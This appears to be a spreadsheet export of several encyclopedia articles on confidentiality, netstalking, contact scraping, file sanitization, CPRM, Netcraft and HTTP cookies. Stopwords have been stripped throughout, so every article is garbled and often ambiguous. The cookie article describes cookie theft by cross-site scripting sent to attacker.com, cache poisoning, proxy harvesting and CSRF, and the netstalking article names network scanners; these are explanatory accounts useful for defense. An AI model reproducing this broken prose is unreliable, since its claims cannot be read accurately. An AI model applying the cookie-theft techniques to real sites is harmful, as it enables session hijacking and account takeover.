section 6068), california lawyers even permitted disclose client commit murder assault. supreme court california promptly amended california rules professional conduct conform exception revised statute. recent legislation curtails confidentiality professionals like lawyers accountants maintain expense state. accountants, example, required disclose state suspicions fraudulent accounting and, even, legitimate saving schemes schemes already known authorities. breach confidence english "three traditional requirements cause action breach confidence": [19] identified megarry coco clark (engineers) (1968) following terms: judgment, three elements normally required apart contract, case breach confidence succeed. first, information itself, words lord greene, m.r. saltman case page 215, must "have necessary quality confidence it." secondly, information must imparted circumstances importing obligation confidence. thirdly, must unauthorised information detriment party communicating 1896 case featuring royal accoucheur william smoult playfair showed difference medical views. playfair consulted linda kitson; ascertained pregnant separated husband. informed wife, relative kitson's, order protect daughters moral contagion. kitson sued, case gained public notoriety, huge damages awarded doctor. medical confidentiality confidentiality commonly applied conversations doctors patients. legal protections prevent physicians revealing certain discussions patients, even oath court. this physician-patient privilege applies secrets shared physician patient course providing medical care.the rule dates back least hippocratic oath, reads: whatever, connection professional service, connection hear, life men, ought spoken abroad, divulge, reckoning kept secret. traditionally, medical ethics viewed duty confidentiality relatively non-negotiable tenet medical practice. united states confidentiality standard united states hipaa laws, specifically privacy rule, various state laws, rigorous hipaa. however, numerous exceptions rules carved years. example, many american states require physicians report gunshot wounds police impaired drivers department motor vehicles. confidentiality also challenged cases involving diagnosis sexually transmitted disease patient refuses reveal diagnosis spouse, termination pregnancy underage patient, without knowledge patient's parents. many states u.s. laws governing parental notification underage abortion. european union directive 2001/20/ec, inspectors appointed member states maintain confidentiality whenever gain access confidential information result good clinical practice inspections accordance applicable national international requirements.a typical patient declaration might read: informed benefit gain protection rights granted european union data protection directive national laws protection personal data. agree representatives sponsor possibly health authorities access medical records. participation study treated confidential. referred name report study. identity disclosed person, except purposes described event medical emergency required law.my data processed electronically determine outcome study, provide health authorities. data transferred countries (such usa). purposes sponsor protect personal information even countries whose data privacy laws less strict country. confidentiality united kingdom information individual's status kept confidential within national health service. this based law, constitution rules procedures. also outlined every employee's contract employment professional standards regulatory bodies. national aids trust's confidentiality nhs: your information, your rights outlines rights. registered healthcare professionals must abide standards found breached confidentiality, face disciplinary action. healthcare worker shares confidential information someone else provide patient directly healthcare make sure best possible treatment. they share information relevant care instance, consent. there ways give consent: explicit consent implied consent. explicit consent patient clearly communicates healthcare worker, verbally writing way, relevant confidential information shared. implied consent, means patient's consent share personal confidential information assumed. when personal confidential information shared healthcare workers, consent taken implied. patient want healthcare worker share confidential health information, need make clear discuss matter healthcare staff. patients right, situations, refuse permission health care professional share information another healthcare professional, even giving care—but advised, appropriate, dangers course action, possible drug interactions. however, limited instances, healthcare worker share personal information without consent public interest. these instances guidance general medical council, regulatory body doctors. sometimes healthcare worker provide information required response court order. national aids trust written guide people living confidentiality nhs. clinical counseling psychology ethical principle confidentiality requires information shared client therapist course treatment shared others. this principle bolsters therapeutic alliance, promotes environment trust. there important exceptions confidentiality, namely conflicts clinician's duty warn duty protect. this includes instances suicidal behavior homicidal plans, child abuse, elder abuse dependent adult abuse. recently, confidentiality laws changed doctors nurses face strict penalties breach confidentiality. commercial confidentiality some legal jurisdictions recognise category commercial confidentiality whereby business withhold information basis perceived harm "commercial interests". example: soft drink giant coca-cola's main syrup formula remains trade-secret. banking confidentiality public policy concerns confidentiality agreements "seal" litigation settlements uncommon, leave regulators society ignorant public hazards. u.s. state washington, example, journalists discovered dozen medical malpractice cases improperly sealed judges, leading improperly weak discipline state department health. 1990s early 2000s, catholic sexual abuse scandal involved number confidentiality agreements victims. some states passed laws limit confidentiality. example, 1990 florida passed 'sunshine litigation' limits confidentiality concealing public hazards. washington state, texas, arkansas, louisiana laws limiting confidentiality well, although judicial interpretation weakened application types laws. u.s. congress, similar federal sunshine litigation proposed passed 2009, 2011, 2014, 2015. also references external links dictionary definition confidentiality wiktionary quotations related confidentiality wikiquote</t>
  </si>
  <si>
    <t>Netstalking</t>
  </si>
  <si>
    <t>netstalking searching activity carried within limits internet, aimed finding little-known, inaccessible, forbidden, shocking rarely-visited objects, including analysis, systematisation storage. objects found either aesthetically pleasing informationally fulfilling seeker. this mostly includes deep darknet, partially devices, deprecated developing protocols. although irrational, activity develops searching skills mindful work information.the term "netstalking" likely created 2009 russian part net, refers s.t.a.l.k.e.r. methods netstalking netstalking, general methods finding unusual information: deli-search net-random. deli-search, "deliberated search", targeted search objects interest whose characteristics already known. this method usually uses language search queries archives, view deleted versions pages. net-random searches hidden unknown information process trial error. netstalkers, second method considered popular search information, allows network researchers find undefined hidden resources. net-randoming done either scanning address ranges using content randomizers, petittube. special programs used scanning include advanced scanner, nmap zenmap, nesca, routerscan stas’m. search areas netstalkers analyze entire internet, traditionally divided several conditional segments. surface surface public internet. part, find everything used average user network: social networks, blogs, encyclopaedias, news sites others. words, surface found using ordinary search engines (google, yahoo others). surface accounts 15-20% information internet. deep deep made non-indexable resources cannot found help search engines. this happens several reasons. main owner knows site server, never published link page anywhere. deep greatest interest network researchers vastness non-knowledge. netstalkers programs scan ranges addresses study segment. darknet dark darknet closed internet space cannot accessed using network programs. these government, corporate military networks. famous popular representative darknet tor. popularity possibility distributing prohibited materials conditions anonymity. view special software needed, namely tor, i2p, freenet, services allow user bypass blocking many sites. this gives access restricted resources inaccessible ordinary internet users. such resources cannot accessed standard browsers even standard internet connection. darknet dangerous inexperienced users, children, ordinary users. also informative leisure pages. major findings netstalkers usually hidden segments internet, netstalkers find non-indexed pages. occasionally objects net-art. rafman's “nine eyes google street view” project largest highlights net-art. distinctive feature net-art fact surface internet primary environment creation distribution. similar method, discover "unexisting" streets google maps, unknown common people. also, netstalkers find recordings surveillance cameras view search strange interesting events. another direction network archeology—that search popular, forgotten resources, including outdated protocols. interesting fact netstalkers found unprotected servers npps state structures, however, findings usually pick much interest, seen generic finding. criticism because aura mystery around activities netstalkers legends, first attracted attention administrators “death groups”, enforcement agencies became interested activities. net-art, images legends actively used administrators forbidden "death groups" promotion. example, legend “silent house”, recognised creators fiction, acquired cult suicidal meaning. this temporary crisis netstalking cultural phenomenon unusual amount participants came research experience kind mystery. although netstalking occasionally accused propagating violent neurotic content faux information, deep legends, reality activities revealing deconstructing those. also world wide internet surface deep darknet references external links catalog netstalker resources github netstalking telegram channel</t>
  </si>
  <si>
    <t>Contact scraping</t>
  </si>
  <si>
    <t>contact scraping practice obtaining access customer's e-mail account order retrieve contact information used marketing purposes. york times refers practices tagged, mylife desktopdating.net "contact scraping".several commercial packages available implement contact scraping customers including viralinviter, trafficxplode, thetsunamieffect.contact scraping applications scraping, example email scraping tools include uipath, import.io, screen scraper. alternative scraping tools include uzunext, functions, python beautiful soup. legal issues contact scraping legality scraping. scraping tools following scraping tools used alternatives contact scraping: uzunext approach data scraping string methods crawling process applied extract information without using tree functions data. rm() data. rm.a() used scraping strategy. python beautiful soup libraries used scrape data converted data files. legal issues united states united states, exists three commonly legal claims related scraping: compilation copyright infringement, violation computer fraud abuse (cfaa), electronic trespass chattel claims. example, users "scraping tools" violate electronic trespass chattel claims. well-known cases intel corp. hamidi, court decided computer context included common trespass claims. however, three legal claims changed doctrinally, uncertain whether claims still exist future. instance, applicability cfaa narrowed technical similarities scraping browsing. case cultural travel zefer corp., court declined apply cfaa since failed meet standard "damage". european union article eu’s general data protection regulation (gdpr), data controllers obligated inform individuals processing personal data. case bisnode polish supervisory authority, bisnode obtained personal data government public register business activity, data used business purpose. however, bisnode obtained email addresses people, mail notifications sent individuals. instead directly informing people, bisnode simply posted notice website, thus failed comply gdpr’s article obligations. australia australia, address‑harvesting software harvested‑address lists must supplied, acquired, used spam 2003. spam also requires marketing emails sent consent recipients, emails must include opt-out facility. company behind graysonline shopping websites fined sending emails breached spam act. graysonline sent messages without option recipients opt-out receiving emails, sent emails people previously withdrawn consent receiving grays' emails. china under cybersecurity people's republic china, crawling publicly available information regarded legal, would illegal obtain nonpublic, sensitive personal information without consent. november 2017, three people convicted crime illegally scraping information system data stored server beijing bytedance networking technology co., ltd. also scraping data scraping information extraction crawler archiving search engine scraping references</t>
  </si>
  <si>
    <t>Content Disarm &amp; Reconstruction</t>
  </si>
  <si>
    <t>content disarm reconstruction (cdr) computer security technology removing potentially malicious code files. unlike malware analysis, technology determine detect malware's functionality removes file components approved within system's definitions policies.it used prevent cyber security threats entering corporate network perimeter. channels used protect include email website traffic. advanced solutions also provide similar protection computer endpoints, cloud email file sharing services. there three levels cdr; flattening converting original file pdf, stripping active content keeping original file type, eliminating file-borne risk maintaining file type, integrity active content. beyond three levels, also advanced forms able perform "soft conversion" "hard conversion", based user's preference balancing usability security. applications works processing incoming files enterprise network, deconstructing them, removing elements match file type's standards policies. technology rebuilds files clean versions sent users intended.because removes potentially malicious code, effective zero-day vulnerabilities rely unknown threat security technologies would need patch maintain protection. used prevent cyber threats variety sources: email data diodes browsers endpoints file servers cloud email webmail programs smb/cifs removable media scanning (cdr kiosk)cdr applied variety file formats including: images office documents audio/video file formats archives html commercial availability similar file sanitization technology commercially available number companies (sorted a-z): check point (threat extraction), israel, global company established 1993. clearswift (structural sanitization), based cyber security provider. deep secure (content threat removal ctr), based cyber security provider. acquired forcepoint 2021. forcepoint, usa, provides defense-grade cross domain solutions large enterprises, critical infrastructure governments years. fortinet, usa, founded 2000 headquartered sunnyvale, california, offices around globe. gatescanner sasa software, israel offices singapore. glasswall british cybersecurity firm offers instant protection file-based threats technology. founded 2005. jiransecurity, south korea, highly-specialized security company established 2014. resec technologies, israel, established 2012. opswat, usa, global cyber-security company founded 2002 offices north america, europe, asia. softcamp, south korean information security company established 1999 headquartered south korea offices japan. votiro (secure file gateway, level cdr), global cyber-security company established 2010 offices north america, europe, asia. yazamtech, technology, small israeli startup established 2008. odix (odi) israel, malware prevention deep file inspection solutions company established 2012. open source implementations docbleach exefilter also advanced persistent threat computer security cyber threats deep content inspection internet security content threat removal references</t>
  </si>
  <si>
    <t>Content Protection for Recordable Media</t>
  </si>
  <si>
    <t>content protection recordable media pre-recorded media (cprm cppm) mechanism controlling copying, moving, deletion digital media host device, personal computer, player. form digital rights management (drm) developed entity, (consisting ibm, intel, matsushita toshiba). cprm cppm specification defines renewable cryptographic method restricting content recorded physical media. currently implemented method utilizes cryptomeria cipher (c2) algorithm symmetric encryption. types physical media supported include, limited recordable media flash memory. widespread cprm arguably secure digital cards sd-audio standard. note available revision includes portions specification covering media. cprm cppm specification designed meet requirements intellectual property owners balancing implementation requirements manufacturers. accomplish requirements, system defined specification relies public-key cryptography's management interchangeable media, content encryption, "media-based renewability." cprm specification access cryptographic materials required implement requires license entity, llc. license includes facsimile product uses cprm cppm technology. controversial proposal generic exchange commands (that could utilized cprm content restriction technologies) specifications removable hard drives abandoned outcry 2001. cprm widely deployed popular secure digital card consumer-electronics flash memory format. notes references external links 2001 register article cprm drives</t>
  </si>
  <si>
    <t>Netcraft</t>
  </si>
  <si>
    <t>netcraft internet services company based bath, somerset, england. company provides cybercrime disruption services across range industries. history netcraft founded mike prettejohn. company provides server hosting market-share analysis, including server operating system detection. cases, depending queried server's operating system, service able monitor uptimes; uptime performance monitoring commonly used factor determining reliability hosting provider. netcraft explored internet since 1995 respected authority market share servers, operating systems, hosting providers, isps, encrypted transactions, electronic commerce, scripting languages content technologies internet. pci-dss approved scanning vendor, netcraft also provides security testing, publishes news releases state various networks make internet. company also known free anti-phishing toolbar firefox, internet explorer, chrome browsers. starting version 9.5, built-in anti-phishing filter opera browser uses data netcraft's toolbar, eliminating need separately installed toolbar. study commissioned microsoft concluded netcraft's toolbar among effective tools combat phishing internet, although since superseded microsoft's internet explorer microsoft phishing filter, possibly result licensing netcraft's data. service process public ipv4 servers exclusion ipv6. browser extensions display security information domain's ipv4 servers even user connected different server ipv6.in november 2016, philip hammond, chancellor exchequer, announced plans government work netcraft develop better automatic defences reduce impact cyber-attacks affecting uk.industry competitors include: alexa internet, compete.com, comscore, customer knowledge, hitwise, nielsen ratings, quantcast, similarweb, spyfu. also search engine optimization metrics dshield, cybercrime analytics services, community volunteer users ranking website reputation references external links official website</t>
  </si>
  <si>
    <t>Cookiejacking</t>
  </si>
  <si>
    <t xml:space="preserve">http cookies (also called cookies, internet cookies, browser cookies, simply cookies) small blocks data created server user browsing website placed user's computer device user's browser. cookies placed device used access website, cookie placed user's device session. cookies serve useful sometimes essential functions web. they enable servers store stateful information (such items added shopping cart online store) user's device track user's browsing activity (including clicking particular buttons, logging recording pages visited past). they also used save subsequent information user previously entered form fields, names, addresses, passwords, payment card numbers. authentication cookies commonly used servers authenticate user logged account logged without cookie, users would need authenticate logging page containing sensitive information wish access. security authentication cookie generally depends security issuing website user's browser, whether cookie data encrypted. security vulnerabilities allow cookie's data read attacker, used gain access user data, used gain access (with user's credentials) website cookie belongs (see cross-site scripting cross-site request forgery examples).tracking cookies, especially third-party tracking cookies, commonly used ways compile long-term records individuals' browsing histories potential privacy concern prompted european u.s. lawmakers take action 2011. european requires websites targeting european union member states gain "informed consent" users storing non-essential cookies device. background origin name term "cookie" coined web-browser programmer montulli. derived term "magic cookie", packet data program receives sends back unchanged, used unix programmers. term magic cookie derives fortune cookie, cookie embedded message. history magic cookies already used computing computer programmer montulli idea using communications june 1994. time, employee netscape communications, developing e-commerce application mci. vint cerf john klensin represented technical discussions netscape communications. want servers retain partial transaction states, netscape find store state user's computer instead. cookies provided solution problem reliably implementing virtual shopping cart.together john giannandrea, montulli wrote initial netscape cookie specification year. version 0.9beta mosaic netscape, released october 1994, supported cookies. first cookies (out labs) checking whether visitors netscape website already visited site. montulli applied patent cookie technology 1995, granted 1998. support cookies integrated internet explorer version released october 1995.the introduction cookies widely known public time. particular, cookies accepted default, users notified presence. public learned cookies financial times published article february 1996. year, cookies received media attention, especially potential privacy implications. cookies discussed u.s. federal trade commission hearings 1996 1997.the development formal cookie specifications already ongoing. particular, first discussions formal specification started april 1995 www-talk mailing list. special working group within internet engineering task force (ietf) formed. alternative proposals introducing state http transactions proposed brian behlendorf david kristol respectively. group, headed kristol montulli, soon decided netscape specification starting point. february 1996, working group identified third-party cookies considerable privacy threat. specification produced group eventually published 2109 february 1997. specifies third-party cookies either allowed all, least enabled default.at time, advertising companies already using third-party cookies. recommendation third-party cookies 2109 followed netscape internet explorer. 2109 superseded 2965 october 2000. 2965 added set-cookie2 header field, informally came called "rfc 2965-style cookies" opposed original set-cookie header field called "netscape-style cookies". set-cookie2 seldom used, however, deprecated 6265 april 2011 written definitive specification cookies used real world. modern browser recognizes set-cookie2 header field. terminology session cookie session cookie (also known in-memory cookie, transient cookie non-persistent cookie) exists temporary memory user navigates website. session cookies expire deleted user closes browser. session cookies identified browser absence expiration date assigned them. persistent cookie persistent cookie expires specific date specific length time. persistent cookie's lifespan creator, information transmitted server every time user visits website belongs every time user views resource belonging website another website (such advertisement). reason, persistent cookies sometimes referred tracking cookies used advertisers record information user's browsing habits extended period time. however, also used "legitimate" reasons (such keeping users logged accounts websites, avoid re-entering login credentials every visit). secure cookie secure cookie transmitted encrypted connection (i.e. https). they cannot transmitted unencrypted connections (i.e. http). this makes cookie less likely exposed cookie theft eavesdropping. cookie made secure adding secure flag cookie. http-only cookie http-only cookie cannot accessed client-side apis, javascript. this restriction eliminates threat cookie theft cross-site scripting (xss). however, cookie remains vulnerable cross-site tracing (xst) cross-site request forgery (csrf) attacks. cookie given characteristic adding httponly flag cookie. same-site cookie 2016 google chrome version introduced kind cookie attribute samesite. attribute samesite value strict, none. with attribute samesite=strict, browsers would send cookies target domain origin domain. this would effectively mitigate cross-site request forgery (csrf) attacks. with samesite=lax, browsers would send cookies requests target domain even different origin domain, safe requests (post unsafe) third-party cookies (inside iframe). attribute samesite=none would allow third-party (cross-site) cookies, however, browsers require secure attribute samesite=none cookies.the same-site cookie incorporated draft "cookies: http state management mechanism" update 6265 approved). chrome, firefox, microsoft edge started support same-site cookies. rollout treatment existing cookies without samesite attribute defined, chrome treating existing cookies samesite=none, would keep website/applications before. google intended change default samesite=lax february 2020, change would break applications/websites rely third-party/cross-site cookies, without samesite attribute defined. given extensive changes developers covid-19 circumstances, google temporarily rolled back samesite cookie change. third-party cookie normally, cookie's domain attribute match domain shown browser's address bar. this called first-party cookie. third-party cookie, however, belongs domain different shown address bar. this sort cookie typically appears pages feature content external websites, banner advertisements. this opens potential tracking user's browsing history often used advertisers effort serve relevant advertisements user. example, suppose user visits www.example.org. this website contains advertisement ad.foxytracking.com, which, downloaded, sets cookie belonging advertisement's domain (ad.foxytracking.com). then, user visits another website, www.foo.com, also contains advertisement ad.foxytracking.com sets cookie belonging domain (ad.foxytracking.com). eventually, cookies sent advertiser loading advertisements visiting website. advertiser cookies build browsing history user across websites advertiser, http referer header field. 2014, websites setting cookies readable third-party domains. average, single website setting cookies, maximum number cookies (first- third-party) reaching 800.most modern browsers contain privacy settings block third-party cookies, block third-party cookies default july 2020, browsers include apple safari, firefox, brave. safari allows embedded sites storage access request permission first-party cookies. 2020, google chrome introduced features block third-party cookies default incognito mode private browsing, making blocking optional normal browsing. update also added option block first-party cookies. chrome plans start blocking third-party cookies default 2023. supercookie supercookie cookie origin top-level domain (such .com) public suffix (such .co.uk). ordinary cookies, contrast, origin specific domain name, example.com. supercookies potential security concern therefore often blocked browsers. unblocked browser, attacker control malicious website could supercookie potentially disrupt impersonate legitimate user requests another website shares top-level domain public suffix malicious website. example, supercookie origin .com, could maliciously affect request made example.com, even cookie originate example.com. this used fake logins change user information. public suffix list helps mitigate risk supercookies pose. public suffix list cross-vendor initiative aims provide accurate up-to-date list domain name suffixes. older versions browsers up-to-date list, therefore vulnerable supercookies certain domains. other uses term "supercookie" sometimes used tracking technologies rely http cookies. "supercookie" mechanisms found microsoft websites august 2011: cookie syncing respawned muid (machine unique identifier) cookies, etag cookies. media attention, microsoft later disabled code. 2021 blog post, mozilla used term "supercookie" refer browser cache means tracking users across sites. zombie cookie zombie cookie data code placed server visitor's computer device hidden location outside visitor's browser's dedicated cookie storage location, automatically recreates http cookie regular cookie original cookie deleted. zombie cookie stored multiple locations, flash local shared object, html5 storage, client-side even server-side locations, cookie's absence detected, cookie recreated using data stored locations. cookie wall cookie wall pops website informs user website's cookie usage. reject option, website accessible without tracking cookies. structure cookie consists following components: name value zero attributes (name/value pairs). attributes store information cookie's expiration, domain, flags (such secure httponly). uses session management cookies originally introduced provide users record items want purchase navigate throughout website virtual "shopping cart" "shopping basket"). today, however, contents user's shopping cart usually stored database server, rather cookie client. keep track user assigned shopping cart, server sends cookie client contains unique session identifier (typically, long string random letters numbers). because cookies sent server every request client makes, session identifier sent back server every time user visits page website, lets server know shopping cart display user. another popular cookies logging websites. when user visits website's login page, server typically sends client cookie containing unique session identifier. when user successfully logs server remembers particular session identifier authenticated grants user access services. because session cookies contain unique session identifier, makes amount personal information website save user virtually limitless—the website limited restrictions concerning large cookie session cookies also help improve page load times, since amount information session cookie small requires little bandwidth. personalization cookies used remember information user order show relevant content user time. example, server might send cookie containing username last used website, filled automatically next time user logs many websites cookies personalization based user's preferences. users select preferences entering form submitting form server. server encodes preferences cookie sends cookie back browser. this way, every time user accesses page website, server personalize page according user's preferences. example, google search engine used cookies allow users (even non-registered ones) decide many search results page wanted see. also, duckduckgo uses cookies allow users viewing preferences like colors page. tracking tracking cookies used track users' browsing habits. this also done extent using address computer requesting page referer field http request header, cookies allow greater precision. this demonstrated follows: user requests page site, request contains cookie, server presumes first page visited user. server creates unique identifier (typically string random letters numbers) sends cookie back browser together requested page. from point cookie automatically sent browser server every time page site requested. server sends page usual also stores requested page, date/time request, cookie file.by analyzing file, possible find pages user visited, sequence, long. corporations exploit users' habits tracking cookies collect information buying habits. wall street journal found america's fifty websites installed average sixty-four pieces tracking technology onto computers, resulting total 3,180 tracking files. data collected sold bidding corporations. implementation cookies arbitrary pieces data, usually chosen first sent server, stored client computer browser. browser sends back server every request, introducing states (memory previous events) otherwise stateless http transactions. without cookies, retrieval page component page would isolated event, largely unrelated page views made user website. although cookies usually server, also client using scripting language javascript (unless cookie's httponly flag set, case cookie cannot modified scripting languages). cookie specifications require browsers meet following requirements order support cookies: support cookies large 4,096 bytes size. support least cookies domain (i.e. website). support least 3,000 cookies total. setting cookie cookies using set-cookie header field, sent http response server. this header field instructs browser store cookie send back future requests server (the browser ignore header field support cookies disabled cookies). example, browser sends first http request homepage www.example.org website: server responds set-cookie header fields: server's http response contains contents website's homepage. also instructs browser cookies. first, "theme", considered session cookie since expires max-age attribute. session cookies intended deleted browser browser closes. second, "sessiontoken", considered persistent cookie since contains expires attribute, instructs browser delete cookie specific date time. next, browser sends another request visit spec.html page website. this request contains cookie header field, contains cookies server instructed browser set: this way, server knows http request related previous one. server would answer sending requested page, possibly including set-cookie header fields http response order instruct browser cookies, modify existing cookies, remove existing cookies. remove cookie, server must include set-cookie header field expiration date past. value cookie consist printable ascii character unicode \u0021 \u007e) excluding ,and; whitespace characters. name cookie excludes characters, well since delimiter name value. cookie standard 2965 restrictive implemented browsers. term "cookie crumb" sometimes used refer cookie's name–value pair.cookies also scripting languages javascript within browser. javascript, object document.cookie used purpose. example, instruction document.cookie "temperature=20" creates cookie name "temperature" value "20". cookie attributes addition name value, cookies also attributes. browsers include cookie attributes requests server—they send cookie's name value. cookie attributes used browsers determine delete cookie, block cookie whether send cookie server. domain path domain path attributes define scope cookie. they essentially tell browser website cookie belongs security reasons, cookies current resource's domain subdomains, another domain subdomains. example, website example.org cannot cookie domain foo.com would allow website example.org control cookies domain foo.com. cookie's domain path attributes specified server, default domain path resource requested. however, browsers difference cookie foo.com without domain, cookie foo.com domain. former case, cookie sent requests foo.com, also known host-only cookie. latter case, subdomains also included (for example, docs.foo.com). notable exception general rule edge prior windows internet explorer prior windows (april 2018), always sends cookies subdomains regardless whether cookie without domain.below example set-cookie header fields http response website user logged http request sent webpage within docs.foo.com subdomain: first cookie, lsid, domain attribute, path attribute /accounts. this tells browser cookie requesting pages contained docs.foo.com/accounts (the domain derived request domain). cookies, hsid ssid, would used browser requests subdomain .foo.com path (for example www.foo.com/bar). prepending optional recent standards, added compatibility 2109 based implementations. expires max-age expires attribute defines specific date time browser delete cookie. date time specified form wdy, yyyy hh:mm:ss gmt, form wdy, hh:mm:ss values greater equal less equal 69.alternatively, max-age attribute used cookie's expiration interval seconds future, relative time browser received cookie. below example three set-cookie header fields received website user logged first cookie, expire sometime january 2013. used client browser time. second cookie, made_write_conn, expiration date, making session cookie. deleted user closes browser. third cookie, reg_fb_gate, value changed "deleted", expiration time past. browser delete cookie right away expiration time past. note cookie deleted domain path attributes set-cookie field match values used cookie created. 2016 internet explorer support max-age. secure httponly secure httponly attributes associated values. rather, presence attribute names indicates behaviors enabled. secure attribute meant keep cookie communication limited encrypted transmission, directing browsers cookies secure/encrypted connections. however, server sets cookie secure attribute non-secure connection, cookie still intercepted sent user man-in-the-middle attacks. therefore, maximum security, cookies secure attribute secure connection. httponly attribute directs browsers expose cookies channels http (and https) requests. this means cookie cannot accessed client-side scripting languages (notably javascript), therefore cannot stolen easily cross-site scripting pervasive attack technique). browser settings most modern browsers support cookies allow user disable them. following common options: enable disable cookies completely, always accepted always blocked. view selectively delete cookies using cookie manager. fully wipe private data, including cookies.add-on tools managing cookie permissions also exist. privacy third-party cookies cookies important implications privacy anonymity users. while cookies sent server setting server internet domain, page contain images components stored servers domains. cookies retrieval components called third-party cookies. older standards cookies, 2109 2965, specify browsers protect user privacy allow sharing cookies servers default. however, newer standard, 6265, explicitly allows user agents implement whichever third-party cookie policy wish. most browsers, mozilla firefox, internet explorer, opera, google chrome, allow third-party cookies default, long third-party website compact privacy policy published. newer versions safari block third-party cookies, planned mozilla firefox well (initially planned version postponed indefinitely). advertising companies third-party cookies track user across multiple sites. particular, advertising company track user across pages placed advertising images bugs. knowledge pages visited user allows advertising company target advertisements user's presumed preferences. website operators disclose third-party cookie consumers risk harming consumer trust cookie discovered. having clear disclosure (such privacy policy) tends eliminate negative effects cookie discovery.the possibility building profile users privacy threat, especially tracking done across multiple domains using third-party cookies. reason, countries legislation cookies. united states government strict rules setting cookies 2000 disclosed white house drug policy office used cookies track computer users viewing online anti-drug advertising. 2002, privacy activist daniel brandt found leaving persistent cookies computers visited website. when notified violating policy, stated cookies intentionally stopped setting them. december 2005, brandt discovered national security agency (nsa) leaving persistent cookies visitors' computers software upgrade. after informed, immediately disabled cookies. cookie directive 2002, european union launched directive privacy electronic communications (e-privacy directive), policy requiring users' consent placement cookies, similar technologies storing accessing information users' equipment. particular, article paragraph mandates storing technically unnecessary data user's computer done user provided information data used, user given possibility denying storage operation. directive require users authorise provided notice cookie usage functionally required delivering service requested, example retain settings, store log-in sessions, remember user's shopping basket.in 2009, amended directive 2009/136/ec, included change article paragraph instead option users cookie storage, revised directive requires consent obtained cookie storage. definition consent cross-referenced definition european data protection law, firstly data protection directive 1995 subsequently general data protection regulation (gdpr). definition consent strengthened text gdpr, effect increasing quality consent required storing accessing information cookies users devices. case decided data protection directive however, court justice european union later confirmed however previous implied strong quality consent current instrument. addition requirement consent stems storing accessing information user's terminal device, information many cookies considered personal data gdpr alone, require legal basis process. this case since 1995 data protection directive, used identical definition personal data, although gdpr interpretative recital clarifies cookie identifiers included. while data processing gdpr requires consent, characteristics behavioural advertising mean difficult impossible justify ground.consent combination gdpr e-privacy directive meet number conditions relation cookies. must freely given unambiguous: preticked boxes banned data protection directive 1995 gdpr (recital 32). gdpr specific consent must 'easy withdraw give', meaning reject-all button must easy access terms clicks visibility 'accept all' button. must specific informed, meaning consent relates particular purposes data, organisations seeking consent must specifically named. court justice european union also ruled consent must 'efficient timely', meaning must gained cookies laid data processing begins instead afterwards.the industry's response largely negative. robert bond firm speechly bircham describes effects "far-reaching incredibly onerous" "all companies". simon davis privacy international argues proper enforcement would "destroy entire industry". however, scholars note onerous nature cookie pop-ups stems attempt continue operate business model convoluted requests incompatible gdpr.academic studies regulators describe wide-spread non-compliance law. study scraping 10,000 websites found 11.8% sites adhered minimal legal requirements, 33.4% websites studied providing mechanism reject cookies easy accepting them. study 17,000 websites found sites breached criterion, finding additionally many laid third party cookies notice all. regulator, information commissioner's office, stated 2019 industry's 'transparency consent framework' advertising technology group interactive advertising bureau 'insufficient ensure transparency fair processing personal data question therefore also insufficient provide free informed consent, attendant implications pecr [e-privacy] compliance.' many companies sell compliance solutions (consent management platforms) permit configured manifestly illegal ways, scholars noted creates questions around appropriate allocation liability.a specification called proposed servers communicate privacy policy browsers, allowing automatic, user-configurable handling. however, websites implement specification, major browsers support discontinued work specification. third-party cookies blocked browsers increase privacy reduce tracking advertising tracking companies without negatively affecting user's experience sites. some sites operate 'cookie walls', make access site conditional allowing cookies either technically browser, pressing 'accept', both. 2020, european data protection board, composed data protection regulators, stated cookie walls illegal.in order consent freely given, access services functionalities must made conditional consent user storing information, gaining access information already stored, terminal equipment user called cookie walls).many advertising operators opt-out option behavioural advertising, generic cookie browser stopping behavioural advertising. however, often ineffective many forms tracking, first-party tracking growing popularity avoid impact browsers blocking third party cookies. furthermore, setting difficult place acceptance tracking, remains breach conditions e-privacy directive. cookie theft session hijacking most websites cookies identifiers user sessions, methods identifying users limitations vulnerabilities. website uses cookies session identifiers, attackers impersonate users' requests stealing full victims' cookies. from server's point view, request attacker authentication victim's requests; thus request performed behalf victim's session. listed various scenarios cookie theft user session hijacking (even without stealing user cookies) work websites relying solely http cookies user identification. network eavesdropping traffic network intercepted read computers network sender receiver (particularly unencrypted open wi-fi). this traffic includes cookies sent ordinary unencrypted http sessions. where network traffic encrypted, attackers therefore read communications users network, including http cookies well entire contents conversations, purpose man-in-the-middle attack. attacker could intercepted cookies impersonate user perform malicious task, transferring money victim's bank account. this issue resolved securing communication user's computer server employing transport layer security (https protocol) encrypt connection. server specify secure flag setting cookie, cause browser send cookie encrypted channel, connection. publishing false sub-domain: cache poisoning attacker able cause server cache fabricated entry (called cache poisoning), could allow attacker gain access user's cookies. example, attacker could cache poisoning create fabricated entry f12345.www.example.com points address attacker's server. attacker post image server (for example, http://f12345.www.example.com/img_4_cookie.jpg). victims reading attacker's message would download image f12345.www.example.com. since f12345.www.example.com sub-domain www.example.com, victims' browsers would submit example.com-related cookies attacker's server. attacker able accomplish this, usually fault internet service providers properly securing servers. however, severity attack lessened target website uses secure cookies. case, attacker would extra challenge obtaining target website's certificate certificate authority, since secure cookies transmitted encrypted connection. without matching certificate, victims' browsers would display warning message attacker's invalid certificate, would help deter users visiting attacker's fraudulent website sending attacker cookies. cross-site scripting: cookie theft cookies also stolen using technique called cross-site scripting. this occurs attacker takes advantage website allows users post unfiltered html javascript content. posting malicious html javascript code, attacker cause victim's browser send victim's cookies website attacker controls. example, attacker post message www.example.com following link: when another user clicks link, browser executes piece code within onclick attribute, thus replacing string document.cookie list cookies accessible current page. result, list cookies sent attacker.com server. attacker's malicious posting https website https://www.example.com, secure cookies also sent attacker.com plain text. responsibility website developers filter malicious code. such attacks mitigated using httponly cookies. these cookies accessible client-side scripting languages like javascript, therefore, attacker able gather cookies. cross-site scripting: proxy request older versions many browsers, security holes implementation xmlhttprequest api. this allows pages specify proxy server would reply, proxy server subject same-origin policy. example, victim reading attacker's posting www.example.com, attacker's script executed victim's browser. script generates request www.example.com proxy server attacker.com. since request www.example.com, example.com cookies sent along request, routed attacker's proxy server. hence, attacker would able harvest victim's cookies. this attack would work secure cookies, since transmitted https connections, https protocol dictates end-to-end encryption (i.e. information encrypted user's browser decrypted destination server). case, proxy server would raw, encrypted bytes http request. cross-site request forgery example, might browsing chat forum another user, mallory, posted message. suppose mallory crafted html image element references action bob's bank's website (rather image file), e.g., bob's bank keeps authentication information cookie, cookie expired, attempt bob's browser load image submit withdrawal form cookie, thus authorizing transaction without bob's approval. cookiejacking cookiejacking attack internet explorer allows attacker steal session cookies user tricking user dragging object across screen. microsoft deemed flaw low-risk "the level required user 